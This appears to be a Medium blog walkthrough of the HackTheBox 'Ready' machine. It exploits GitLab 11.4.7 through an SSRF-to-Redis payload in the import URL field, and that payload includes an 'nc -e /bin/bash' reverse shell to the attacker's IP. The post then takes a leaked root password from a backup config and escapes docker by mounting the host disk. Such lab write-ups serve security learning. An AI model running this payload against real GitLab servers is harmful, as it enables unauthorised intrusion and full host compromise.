HackTheBox: (“Ready”) — Walkthrough

Hi People :D

Today we gonna solve “Ready” machine from HackTheBox, let’s GOOOOO :D


— — —


— — — — — —

Start with Nmap

nmap -A

We have two open ports (22/5080) so let’s navigate to the website on port 5080

Web Enumeration

— — — — — — — —

We have a GitLab running on port 5080

First, make an account then login with it.

Then navigate directly to the help directory, why ?! ... That’s because most of the machines running an outdated version of GitLab that has a lot of bugs.

In our case, we have a GitLab-11.4.7, it’s an outdated version! so let’s search for exploitation


— — — — — —

I found This Awesome LiveOverFlow Video that explained how to exploit RCE in this GitLab version

I also found This GitHub repo that contains a PoC payload and a BurpSuite request sample

Burpsuite request sample

We just have to follow these steps to get a shell

First, we have to make a git repo by URL:

Home -> New Project -> Import project -> git repo by URL

Then in the Git repository URL field paste this line (as shown in the above github repo):


Second, open BurpSuite ( or any HTTP interceptor program ) and click Create project

Now we have the required request, send it to Repeater so that we can test the exploit comfortably.

As shown in the PoC and the Burpsuite request sample, we have to paste this payload under project[import_url] parameter in order to get a shell (DO NOT delete the spaces):

sadd resque:gitlab:queues system_hook_push
lpush resque:gitlab:queue:system_hook_push "{\"class\":\"GitlabShellWorker\",\"args\":[\"class_eval\",\"open(\'|nc -e /bin/bash {Your_IP} 1234\').read\"],\"retry\":3,\"queue\":\"system_hook_push\",\"jid\":\"ad52abc5641173e217eb2e52\",\"created_at\":1513714403.8122594,\"enqueued_at\":1513714403.8129568}"

And we successfully got a shell as git :)

User Flag

— — — — —

After getting the shell, improve it a bit using :

python3 -c 'import pty; pty.spawn("/bin/bash")'export TERM=linux

Then move to the home directory, there’s a directory called dude and we are able to access it.

Fortunately, it contains the user flag :D

Root Flag

— — — — —

Let’s enumerate the files maybe we find something interesting.

The first place I often search in is the /opt directory because it contains packages and services files that not a part of the operating system distribution, but provided by an independent source.. these packages contain configuration files and backups that often have hardcoded creds in them.

As expected, there's a password in gitlab.rb file inside /opt/backup directory

Try this password (wW59U!ZKMbG9+*#h) with root and we successfully change to root user

If you notice, we are root but still in gitlab! ( root@gitlab ).

I immediately knew that I am in a docker container and I made sure when I found the docker configuration files (such as .dockerenv and .dockerinit).

So we need to escape from this docker container.

I found This Article talking about the ways to escape from docker containers, we can escape from it using the mounting method (as shown in the upper article)

First use fdisk -l command to know the target disk number, in our case our target is sda2

To mount the data, create an empty directory inside another empty directory with:

mkdir -p /firstDir/secondDir

Then mount the data using:

mount /dev/sda2 /firstDir/secondDir 

You will find the root flag in /firstDir/secondDir/root/root.txt

Thanks for reading.. hope you love this writeup ❤.

You can give me a Respect on my HackTheBox Account (if you want :D).

Facebook TwitterLinkedIn



GameDev | Pentester | Bug Hunter | Security Researcher | IoT Sec | Digital Forensics Investigator | CTF player

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Mohamed Elmasry

GameDev | Pentester | Bug Hunter | Security Researcher | IoT Sec | Digital Forensics Investigator | CTF player